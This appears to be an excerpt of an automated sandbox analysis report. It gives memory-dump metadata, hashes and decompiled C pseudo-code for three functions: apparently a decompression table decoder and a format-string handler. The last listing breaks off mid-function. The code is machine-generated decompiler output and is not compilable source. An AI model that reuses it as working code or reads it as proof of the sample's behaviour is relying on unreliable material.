              0x00d7e384
              0x00d7e388
              0x00d7e38c
              0x00d7e390
              0x00d7e397
              0x00d7e39a
              0x00d7e39e
              0x00d7e3a1
              0x00d7e3a3
              0x00d7e3a6
              0x00d7e3a9
              0x00d7e3ad
              0x00d7e3ad
              0x00000000
              0x00d7e3b8
              0x00000000
              0x00d7df3f
              0x00d7e3d1

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c5f4e30b78326c8f17be1c3512a1164680c15f11dc535b3ea8f202eb142ec06f
              • Instruction ID: d97a4143647d431dd85ae0d2cee9a0c234f7eb5ad28e9f11e41c13d22731cf27
              • Opcode Fuzzy Hash: c5f4e30b78326c8f17be1c3512a1164680c15f11dc535b3ea8f202eb142ec06f
              • Instruction Fuzzy Hash: 6EE13574518390CFC309CF29E89096ABBF0BF9A301F89495EF9D687356C235E905DB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8364E, Relevance: .3, Instructions: 263COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 78%
              			E00D8364E(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E00D7A4D1(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E00D7A4E8(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00D8E920(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00D7A4D1(_t184, 2);
						do {
							 *(_t201 + 0x14) = E00D7A4E8(_t184) >> 0x0000000c & 0x000000ff;
							E00D7A4D1(_t184, 4);
							_t88 =  *(_t201 + 0x10);
							__eflags = _t88 - 0xf;
							if(_t88 != 0xf) {
								 *(_t201 + _t137 + 0x14) = _t88;
								goto L15;
							}
							_t187 = E00D7A4E8(_t184) >> 0x0000000c & 0x000000ff;
							E00D7A4D1(_t184, 4);
							__eflags = _t187;
							if(_t187 != 0) {
								_t188 = _t187 + 2;
								__eflags = _t188;
								while(1) {
									_t188 = _t188 - 1;
									__eflags = _t137 - 0x14;
									if(_t137 >= 0x14) {
										break;
									}
									 *(_t201 + _t137 + 0x14) = 0;
									_t137 = _t137 + 1;
									__eflags = _t188;
									if(_t188 != 0) {
										continue;
									}
									break;
								}
								_t137 = _t137 - 1;
								goto L15;
							}
							 *(_t201 + _t137 + 0x14) = 0xf;
							L15:
							_t137 = _t137 + 1;
							__eflags = _t137 - 0x14;
						} while (_t137 < 0x14);
						_push(0x14);
						_t189 = _t185 + 0x3c50;
						_push(_t189);
						_push(_t201 + 0x1c);
						E00D82C88();
						_t138 = 0;
						__eflags = 0;
						do {
							__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84)) - 5;
							if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84)) - 5) {
								L19:
								_t93 = E00D7A4ED(_t184);
								_t94 =  *(_t189 + 0x84);
								_t180 = _t93 & 0x0000fffe;
								__eflags = _t180 -  *((intOrPtr*)(_t189 + 4 + _t94 * 4));
								if(_t180 >=  *((intOrPtr*)(_t189 + 4 + _t94 * 4))) {
									_t148 = 0xf;
									_t95 = _t94 + 1;
									 *(_t201 + 0x10) = _t148;
									__eflags = _t95 - _t148;
									if(_t95 >= _t148) {
										L27:
										_t150 =  *(_t184 + 4) +  *(_t201 + 0x10);
										 *_t184 =  *_t184 + (_t150 >> 3);
										_t98 =  *(_t201 + 0x10);
										 *(_t184 + 4) = _t150 & 0x00000007;
										_t152 = 0x10;
										_t155 =  *((intOrPtr*)(_t189 + 0x44 + _t98 * 4)) + (_t180 -  *((intOrPtr*)(_t189 + _t98 * 4)) >> _t152 - _t98);
										__eflags = _t155 -  *_t189;
										asm("sbb eax, eax");
										_t99 = _t98 & _t155;
										__eflags = _t99;
										_t156 =  *(_t189 + 0xc88 + _t99 * 2) & 0x0000ffff;
										L28:
										__eflags = _t156 - 0x10;
										if(_t156 >= 0x10) {
											__eflags = _t156 - 0x12;
											if(__eflags >= 0) {
												_t157 = _t184;
												if(__eflags != 0) {
													_t192 = (E00D7A4E8(_t157) >> 9) + 0xb;
													__eflags = _t192;
													_push(7);
												} else {
													_t192 = (E00D7A4E8(_t157) >> 0xd) + 3;
													_push(3);
												}
												E00D7A4D1(_t184);
												while(1) {
													_t192 = _t192 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) = 0;
													_t138 = _t138 + 1;
													__eflags = _t192;
													if(_t192 != 0) {
														continue;
													}
													L44:
													_t189 = _t185 + 0x3c50;
													goto L45;
												}
												break;
											}
											__eflags = _t156 - 0x10;
											_t166 = _t184;
											if(_t156 != 0x10) {
												_t198 = (E00D7A4E8(_t166) >> 9) + 0xb;
												__eflags = _t198;
												_push(7);
											} else {
												_t198 = (E00D7A4E8(_t166) >> 0xd) + 3;
												_push(3);
											}
											E00D7A4D1(_t184);
											__eflags = _t138;
											if(_t138 == 0) {
												L47:
												_t116 = 0;
												L49:
												return _t116;
											} else {
												while(1) {
													_t198 = _t198 - 1;
													__eflags = _t138 - 0x194;
													if(_t138 >= 0x194) {
														goto L46;
													}
													 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t201 + _t138 + 0x27));
													_t138 = _t138 + 1;
													__eflags = _t198;
													if(_t198 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t201 + _t138 + 0x28) =  *((intOrPtr*)(_t138 + _t185 + 0xe4c8)) + _t156 & 0x0000000f;
										_t138 = _t138 + 1;
										goto L45;
									}
									_t169 = 4 + _t95 * 4 + _t189;
									__eflags = _t169;
									while(1) {
										__eflags = _t180 -  *_t169;
										if(_t180 <  *_t169) {
											break;
										}
										_t95 = _t95 + 1;
										_t169 = _t169 + 4;
										__eflags = _t95 - 0xf;
										if(_t95 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t201 + 0x10) = _t95;
									goto L27;
								}
								_t170 = 0x10;
								_t183 = _t180 >> _t170 - _t94;
								_t173 = ( *(_t183 + _t189 + 0x88) & 0x000000ff) +  *(_t184 + 4);
								 *_t184 =  *_t184 + (_t173 >> 3);
								 *(_t184 + 4) = _t173 & 0x00000007;
								_t156 =  *(_t189 + 0x488 + _t183 * 2) & 0x0000ffff;
								goto L28;
							}
							_t127 = E00D84393(_t185);
							__eflags = _t127;
							if(_t127 == 0) {
								goto L47;
							}
							goto L19;
							L45:
							__eflags = _t138 - 0x194;
						} while (_t138 < 0x194);
						L46:
						 *((char*)(_t185 + 0xe661)) = 1;
						__eflags =  *_t184 -  *((intOrPtr*)(_t185 + 0x84));
						if( *_t184 <=  *((intOrPtr*)(_t185 + 0x84))) {
							_push(0x12b);
							_push(_t185 + 0xa0);
							_push(_t201 + 0x30);
							E00D82C88();
							_push(0x3c);
							_push(_t185 + 0xf8c);
							_push(_t201 + 0x15b);
							E00D82C88();
							_push(0x11);
							_push(_t185 + 0x1e78);
							_push(_t201 + 0x197);
							E00D82C88();
							_push(0x1c);
							_push(_t185 + 0x2d64);
							_push(_t201 + 0x1a8);
							E00D82C88();
							E00D8EA80(_t185 + 0xe4c8, _t201 + 0x2c, 0x194);
							_t116 = 1;
							goto L49;
						}
						goto L47;
					}
					 *((intOrPtr*)(_t185 + 0xe65c)) = 1;
					_push(_t185 + 0xe4c4);
					_push(_t185);
					return E00D82435(_t185 + 0x98d8, _t178, _t205);
				}
				_t135 = E00D84393(__ecx);
				if(_t135 != 0) {
					goto L2;
				}
				return _t135;
			}





































              0x00d8364e
              0x00d83655
              0x00d8365e
              0x00d83666
              0x00d83675
              0x00d83680
              0x00d83687
              0x00d8368c
              0x00d83691
              0x00d836b6
              0x00d836b8
              0x00d836be
              0x00d836c4
              0x00d836ca
              0x00d836cf
              0x00d836de
              0x00d836e3
              0x00d836e3
              0x00d836ea
              0x00d836f0
              0x00d83701
              0x00d83705
              0x00d8370a
              0x00d8370e
              0x00d83711
              0x00d8374a
              0x00000000
              0x00d8374a
              0x00d83721
              0x00d83724
              0x00d83729
              0x00d8372b
              0x00d83734
              0x00d83734
              0x00d83737
              0x00d83737
              0x00d83738
              0x00d8373b
              0x00000000
              0x00000000
              0x00d8373d
              0x00d83742
              0x00d83743
              0x00d83745
              0x00000000
              0x00000000
              0x00000000
              0x00d83745
              0x00d83747
              0x00000000
              0x00d83747
              0x00d8372d
              0x00d8374e
              0x00d8374e
              0x00d8374f
              0x00d8374f
              0x00d83754
              0x00d83756
              0x00d8375e
              0x00d83763
              0x00d83764
              0x00d83769
              0x00d83769
              0x00d8376b
              0x00d83774
              0x00d83776
              0x00d83787
              0x00d83789
              0x00d83790
              0x00d83796
              0x00d8379c
              0x00d837a0
              0x00d837cd
              0x00d837ce
              0x00d837cf
              0x00d837d3
              0x00d837d5
              0x00d837f3
              0x00d837f6
              0x00d83802
              0x00d83804
              0x00d83808
              0x00d8380d
              0x00d8381a
              0x00d8381c
              0x00d8381f
              0x00d83821
              0x00d83821
              0x00d83823
              0x00d8382b
              0x00d8382b
              0x00d8382e
              0x00d83845
              0x00d83848
              0x00d83894
              0x00d83896
              0x00d838b3
              0x00d838b3
              0x00d838b6
              0x00d83898
              0x00d838a2
              0x00d838a5
              0x00d838a5
              0x00d838ba
              0x00d838bf
              0x00d838bf
              0x00d838c0
              0x00d838c6
              0x00000000
              0x00000000
              0x00d838c8
              0x00d838cd
              0x00d838ce
              0x00d838d0
              0x00000000
              0x00000000
              0x00d838d2
              0x00d838d2
              0x00000000
              0x00d838d2
              0x00000000
              0x00d838bf
              0x00d8384a
              0x00d8384d
              0x00d8384f
              0x00d8386c
              0x00d8386c
              0x00d8386f
              0x00d83851
              0x00d8385b
              0x00d8385e
              0x00d8385e
              0x00d83873
              0x00d83878
              0x00d8387a
              0x00d838f5
              0x00d838f5
              0x00d83974
              0x00000000
              0x00d8387c
              0x00d8387c
              0x00d8387c
              0x00d8387d
              0x00d83883
              0x00000000
              0x00000000
              0x00d83889
              0x00d8388d
              0x00d8388e
              0x00d83890
              0x00000000
              0x00000000
              0x00000000
              0x00d83892
              0x00000000
              0x00d8387c
              0x00d8387a
              0x00d8383b
              0x00d8383f
              0x00000000
              0x00d8383f
              0x00d837de
              0x00d837de
              0x00d837e0
              0x00d837e0
              0x00d837e2
              0x00000000
              0x00000000
              0x00d837e4
              0x00d837e5
              0x00d837e8
              0x00d837eb
              0x00000000
              0x00000000
              0x00000000
              0x00d837ed
              0x00d837ef
              0x00000000
              0x00d837ef
              0x00d837a4
              0x00d837a7
              0x00d837b1
              0x00d837b9
              0x00d837be
              0x00d837c1
              0x00000000
              0x00d837c1
              0x00d8377a
              0x00d8377f
              0x00d83781
              0x00000000
              0x00000000
              0x00000000
              0x00d838d8
              0x00d838d8
              0x00d838d8
              0x00d838e4
              0x00d838e6
              0x00d838ed
              0x00d838f3
              0x00d838f9
              0x00d83906
              0x00d8390b
              0x00d8390c
              0x00d83911
              0x00d8391b
              0x00d83923
              0x00d83924
              0x00d83929
              0x00d83933
              0x00d8393b
              0x00d8393c
              0x00d83941
              0x00d8394b
              0x00d83953
              0x00d83954
              0x00d8396a
              0x00d83972
              0x00000000
              0x00d83972
              0x00000000
              0x00d838f3
              0x00d83699
              0x00d836a3
              0x00d836a4
              0x00000000
              0x00d836ab
              0x00d83668
              0x00d8366f
              0x00000000
              0x00000000
              0x00d8397e

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
              • Instruction ID: bf156598cef93905824d9c0cbb142a2d3122ca85b0876144eb8846c234fe812f
              • Opcode Fuzzy Hash: 670b102bee23b918090604c493983002a4fd191d89aaaada348980dc4f2cf576
              • Instruction Fuzzy Hash: B39145B02043499BDB24FF6CC895BBE73D5EB90704F14492DE58E87282EA75EA44C772
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D93EE9, Relevance: .2, Instructions: 237COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 86%
              			E00D93EE9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t55;
				void* _t56;
				signed int _t57;
				signed char _t60;
				signed char _t62;
				signed int _t64;
				void* _t65;
				signed int _t66;
				signed char _t75;
				signed char _t78;
				void* _t86;
				void* _t88;
				signed char _t90;
				signed char _t92;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int* _t103;
				void* _t105;
				signed int _t111;
				unsigned int _t113;
				signed char _t115;
				void* _t123;
				unsigned int _t124;
				void* _t125;
				signed int _t126;
				short _t127;
				void* _t130;
				void* _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				void* _t138;
				void* _t139;

				_t125 = __edi;
				_t52 =  *0xdad668; // 0x9e43e7e4
				_v8 = _t52 ^ _t135;
				_t134 = __ecx;
				_t102 = 0;
				_t123 = 0x41;
				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
				_t105 = 0x58;
				_t138 = _t54 - 0x64;
				if(_t138 > 0) {
					__eflags = _t54 - 0x70;
					if(__eflags > 0) {
						_t55 = _t54 - 0x73;
						__eflags = _t55;
						if(_t55 == 0) {
							L9:
							_t56 = E00D9491B(_t134);
							L10:
							if(_t56 != 0) {
								__eflags =  *((intOrPtr*)(_t134 + 0x30)) - _t102;
								if( *((intOrPtr*)(_t134 + 0x30)) != _t102) {
									L71:
									_t57 = 1;
									L72:
									return E00D8E203(_t57, _v8 ^ _t135);
								}
								_t124 =  *(_t134 + 0x20);
								_push(_t125);
								_v16 = _t102;
								_t60 = _t124 >> 4;
								_v12 = _t102;
								_t126 = 0x20;
								__eflags = 1 & _t60;
								if((1 & _t60) == 0) {
									L46:
									_t111 =  *(_t134 + 0x32) & 0x0000ffff;
									__eflags = _t111 - 0x78;
									if(_t111 == 0x78) {
										L48:
										_t62 = _t124 >> 5;
										__eflags = _t62 & 0x00000001;
										if((_t62 & 0x00000001) == 0) {
											L50:
											__eflags = 0;
											L51:
											__eflags = _t111 - 0x61;
											if(_t111 == 0x61) {
												L54:
												_t64 = 1;
												L55:
												_t127 = 0x30;
												__eflags = _t64;
												if(_t64 != 0) {
													L57:
													_t65 = 0x58;
													 *((short*)(_t135 + _t102 * 2 - 0xc)) = _t127;
													__eflags = _t111 - _t65;
													if(_t111 == _t65) {
														L60:
														_t66 = 1;
														L61:
														__eflags = _t66;
														asm("cbw");
														 *((short*)(_t135 + _t102 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
														_t102 = _t102 + 2;
														__eflags = _t102;
														L62:
														_t130 =  *((intOrPtr*)(_t134 + 0x24)) -  *((intOrPtr*)(_t134 + 0x38)) - _t102;
														__eflags = _t124 & 0x0000000c;
														if((_t124 & 0x0000000c) == 0) {
															E00D931B0(_t134 + 0x448, 0x20, _t130, _t134 + 0x18);
															_t136 = _t136 + 0x10;
														}
														E00D94C36(_t134 + 0x448,  &_v16, _t102, _t134 + 0x18,  *((intOrPtr*)(_t134 + 0xc)));
														_t113 =  *(_t134 + 0x20);
														_t103 = _t134 + 0x18;
														_t75 = _t113 >> 3;
														__eflags = _t75 & 0x00000001;
														if((_t75 & 0x00000001) != 0) {
															_t115 = _t113 >> 2;
															__eflags = _t115 & 0x00000001;
															if((_t115 & 0x00000001) == 0) {
																E00D931B0(_t134 + 0x448, 0x30, _t130, _t103);
																_t136 = _t136 + 0x10;
															}
														}
														E00D94B18(_t134, 0);
														__eflags =  *_t103;
														if( *_t103 >= 0) {
															_t78 =  *(_t134 + 0x20) >> 2;
															__eflags = _t78 & 0x00000001;
															if((_t78 & 0x00000001) != 0) {
																E00D931B0(_t134 + 0x448, 0x20, _t130, _t103);
															}
														}
														goto L71;
													}
													_t86 = 0x41;
													__eflags = _t111 - _t86;
													if(_t111 == _t86) {
														goto L60;
													}
													_t66 = 0;
													goto L61;
												}
												__eflags = _t64;
												if(_t64 == 0) {
													goto L62;
												}
												goto L57;
											}
											_t132 = 0x41;
											__eflags = _t111 - _t132;
											if(_t111 == _t132) {
												goto L54;
											}
											_t64 = 0;
											goto L55;
										}
										goto L51;
									}
									_t88 = 0x58;
									__eflags = _t111 - _t88;
									if(_t111 != _t88) {
										goto L50;
									}
									goto L48;
								}
								_t90 = _t124 >> 6;
								__eflags = 1 & _t90;
								if((1 & _t90) == 0) {
									__eflags = 1 & _t124;
									if((1 & _t124) == 0) {
										_t92 = _t124 >> 1;
										__eflags = 1 & _t92;
										if((1 & _t92) == 0) {
											goto L46;
										}
										_v16 = _t126;
										L45:
										_t102 = 1;
										goto L46;
									}
									_push(0x2b);
									L40:
									_pop(_t93);
									_v16 = _t93;
									goto L45;
								}
								_push(0x2d);
								goto L40;
							}
							L11:
							_t57 = 0;
							goto L72;
						}
						_t95 = _t55;
						__eflags = _t95;
						if(__eflags == 0) {
							L28:
							_push(_t102);
							_push(0xa);
							L29:
							_t56 = E00D946B3(_t134, _t125, __eflags);
							goto L10;
						}
						__eflags = _t95 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t56 = E00D94890(__ecx);
						goto L10;
					}
					__eflags = _t54 - 0x67;
					if(_t54 <= 0x67) {
						L30:
						_t56 = E00D94419(_t102, _t134);
						goto L10;
					}
					__eflags = _t54 - 0x69;
					if(_t54 == 0x69) {
						L27:
						_t3 = _t134 + 0x20;
						 *_t3 =  *(_t134 + 0x20) | 0x00000010;
						__eflags =  *_t3;
						goto L28;
					}
					__eflags = _t54 - 0x6e;
					if(_t54 == 0x6e) {
						_t56 = E00D947FD(__ecx, _t123);
						goto L10;
					}
					__eflags = _t54 - 0x6f;
					if(_t54 != 0x6f) {
						goto L11;
					}
					_t56 = E00D94871(__ecx);
					goto L10;
				}
				if(_t138 == 0) {
					goto L27;
				}
				_t139 = _t54 - _t105;
				if(_t139 > 0) {
					_t97 = _t54 - 0x5a;
					__eflags = _t97;
					if(_t97 == 0) {
						_t56 = E00D9425C(__ecx);
						goto L10;
					}
					_t98 = _t97 - 7;
					__eflags = _t98;
					if(_t98 == 0) {
						goto L30;
					}
					__eflags = _t98;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t56 = E00D9461B(_t134, __eflags, _t102);
					goto L10;
				}
				if(_t139 == 0) {
					_push(1);
					goto L13;
				}
				if(_t54 == _t123) {
					goto L30;
				}
				if(_t54 == 0x43) {
					goto L17;
				}
				if(_t54 <= 0x44) {
					goto L11;
				}
				if(_t54 <= 0x47) {
					goto L30;
				}
				if(_t54 != 0x53) {
					goto L11;
				}
				goto L9;
			}












































              0x00d93ee9
              0x00d93ef1
              0x00d93ef8
              0x00d93efd
              0x00d93eff
              0x00d93f03
              0x00d93f06
              0x00d93f0a
              0x00d93f0b
              0x00d93f0e
              0x00d93f7b
              0x00d93f7e
              0x00d93fcd
              0x00d93fcd
              0x00d93fd0
              0x00d93f3c
              0x00d93f3e
              0x00d93f43
              0x00d93f45
              0x00d93feb
              0x00d93fee
              0x00d94134
              0x00d94134
              0x00d94136
              0x00d94145
              0x00d94145
              0x00d93ff4
              0x00d93ff9
              0x00d93ffc
              0x00d93fff
              0x00d94003
              0x00d94009
              0x00d9400a
              0x00d9400c
              0x00d94036
              0x00d94036
              0x00d9403a
              0x00d9403d
              0x00d94047
              0x00d94049
              0x00d9404c
              0x00d9404e
              0x00d94054
              0x00d94054
              0x00d94056
              0x00d94056
              0x00d94059
              0x00d94067
              0x00d94067
              0x00d94069
              0x00d9406b
              0x00d9406c
              0x00d9406e
              0x00d94074
              0x00d94076
              0x00d94077
              0x00d9407c
              0x00d9407f
              0x00d9408d
              0x00d9408d
              0x00d9408f
              0x00d9408f
              0x00d9409a
              0x00d9409c
              0x00d940a1
              0x00d940a1
              0x00d940a4
              0x00d940aa
              0x00d940ac
              0x00d940af
              0x00d940bf
              0x00d940c4
              0x00d940c4
              0x00d940d9
              0x00d940de
              0x00d940e1
              0x00d940e6
              0x00d940e9
              0x00d940eb
              0x00d940ed
              0x00d940f0
              0x00d940f3
              0x00d94100
              0x00d94105
              0x00d94105
              0x00d940f3
              0x00d9410c
              0x00d94111
              0x00d94114
              0x00d94119
              0x00d9411c
              0x00d9411e
              0x00d9412b
              0x00d94130
              0x00d9411e
              0x00000000
              0x00d94133
              0x00d94083
              0x00d94084
              0x00d94087
              0x00000000
              0x00000000
              0x00d94089
              0x00000000
              0x00d94089
              0x00d94070
              0x00d94072
              0x00000000
              0x00000000
              0x00000000
              0x00d94072
              0x00d9405d
              0x00d9405e
              0x00d94061
              0x00000000
              0x00000000
              0x00d94063
              0x00000000
              0x00d94063
              0x00000000
              0x00d94050
              0x00d94041
              0x00d94042
              0x00d94045
              0x00000000
              0x00000000
              0x00000000
              0x00d94045
              0x00d94010
              0x00d94013
              0x00d94015
              0x00d94020
              0x00d94022
              0x00d9402a
              0x00d9402c
              0x00d9402e
              0x00000000
              0x00000000
              0x00d94030
              0x00d94034
              0x00d94034
              0x00000000
              0x00d94034
              0x00d94024
              0x00d94019
              0x00d94019
              0x00d9401a
              0x00000000
              0x00d9401a
              0x00d94017
              0x00000000
              0x00d94017
              0x00d93f4b
              0x00d93f4b
              0x00000000
              0x00d93f4b
              0x00d93fd7
              0x00d93fd7
              0x00d93fda
              0x00d93fac
              0x00d93fac
              0x00d93fad
              0x00d93faf
              0x00d93fb1
              0x00000000
              0x00d93fb1
              0x00d93fdc
              0x00d93fdf
              0x00000000
              0x00000000
              0x00d93fe5
              0x00d93f54
              0x00d93f54
              0x00000000
              0x00d93f54
              0x00d93f80
              0x00d93fc3
              0x00000000
              0x00d93fc3
              0x00d93f82
              0x00d93f85
              0x00d93fb8
              0x00d93fba
              0x00000000
              0x00d93fba
              0x00d93f87
              0x00d93f8a
              0x00d93fa8
              0x00d93fa8
              0x00d93fa8
              0x00d93fa8
              0x00000000
              0x00d93fa8
              0x00d93f8c
              0x00d93f8f
              0x00d93fa1
              0x00000000
              0x00d93fa1
              0x00d93f91
              0x00d93f94
              0x00000000
              0x00000000
              0x00d93f98
              0x00000000
              0x00d93f98
              0x00d93f10
              0x00000000
              0x00000000
              0x00d93f16
              0x00d93f18
              0x00d93f58
              0x00d93f58
              0x00d93f5b
              0x00d93f74
              0x00000000
              0x00d93f74
              0x00d93f5d
              0x00d93f5d
              0x00d93f60
              0x00000000
              0x00000000
              0x00d93f63
              0x00d93f66
              0x00000000
              0x00000000
              0x00d93f68
              0x00d93f6b
              0x00000000
              0x00d93f6b
              0x00d93f1a
              0x00d93f52
              0x00000000
              0x00d93f52
              0x00d93f1e
              0x00000000
              0x00000000
              0x00d93f27
              0x00000000
              0x00000000
              0x00d93f2c
              0x00000000
              0x00000000
              0x00d93f31
              0x00000000
              0x00000000
              0x00d93f3a
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a449e46a645e4e2a26dad4e35c5f719328af74c5fd4d044156acce5aa65c2c31
              • Instruction ID: 2469eed672834a2856fd923012548e743ef72b88ce6d3cc92de07300085eb991
              • Opcode Fuzzy Hash: a449e46a645e4e2a26dad4e35c5f719328af74c5fd4d044156acce5aa65c2c31
              • Instruction Fuzzy Hash: 2E616771A0070966DF389E68889AFBE63B4DF41704F18051AE68BDB2C3D661DF878375
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8397F, Relevance: .2, Instructions: 232COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 72%
              			E00D8397F(void* __ecx) {
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t90;
				signed int _t94;
				signed int _t109;
				intOrPtr* _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t150;
				void* _t151;
				signed int _t154;
				unsigned int _t159;
				signed int _t162;
				signed int _t164;
				signed int _t165;
				intOrPtr* _t168;
				void* _t170;
				void* _t171;

				_t170 = __ecx;
				if( *((char*)( *((intOrPtr*)(_t171 + 8)) + 0x11)) != 0) {
					_t168 =  *((intOrPtr*)(_t171 + 0x1d8));
					__eflags =  *((char*)(_t168 + 8));
					if( *((char*)(_t168 + 8)) != 0) {
						L5:
						_t164 = 0;
						__eflags = 0;
						do {
							_t109 = E00D7A4E8(_t168) >> 0x0000000c & 0x000000ff;
							E00D7A4D1(_t168, 4);
							__eflags = _t109 - 0xf;
							if(_t109 != 0xf) {
								 *(_t171 + _t164 + 0x18) = _t109;
								goto L14;
							}
							_t124 = E00D7A4E8(_t168) >> 0x0000000c & 0x000000ff;
							E00D7A4D1(_t168, 4);
							__eflags = _t124;
							if(_t124 != 0) {
								_t125 = _t124 + 2;
								__eflags = _t125;
								while(1) {
									_t125 = _t125 - 1;
									__eflags = _t164 - 0x14;
									if(_t164 >= 0x14) {
										break;
									}
									 *(_t171 + _t164 + 0x18) = 0;
									_t164 = _t164 + 1;
									__eflags = _t125;
									if(_t125 != 0) {
										continue;
									}
									break;
								}
								_t164 = _t164 - 1;
								goto L14;
							}
							 *(_t171 + _t164 + 0x18) = 0xf;
							L14:
							_t164 = _t164 + 1;
							__eflags = _t164 - 0x14;
						} while (_t164 < 0x14);
						_push(0x14);
						_t111 =  *((intOrPtr*)(_t171 + 0x1e8)) + 0x3bb0;
						_push(_t111);
						_push(_t171 + 0x18);
						 *((intOrPtr*)(_t171 + 0x20)) = _t111;
						E00D82C88();
						_t165 = 0;
						__eflags = 0;
						do {
							__eflags =  *((char*)(_t168 + 8));
							if( *((char*)(_t168 + 8)) != 0) {
								L19:
								_t71 = E00D7A4ED(_t168);
								_t72 =  *(_t111 + 0x84);
								_t159 = _t71 & 0x0000fffe;
								__eflags = _t159 -  *((intOrPtr*)(_t111 + 4 + _t72 * 4));
								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
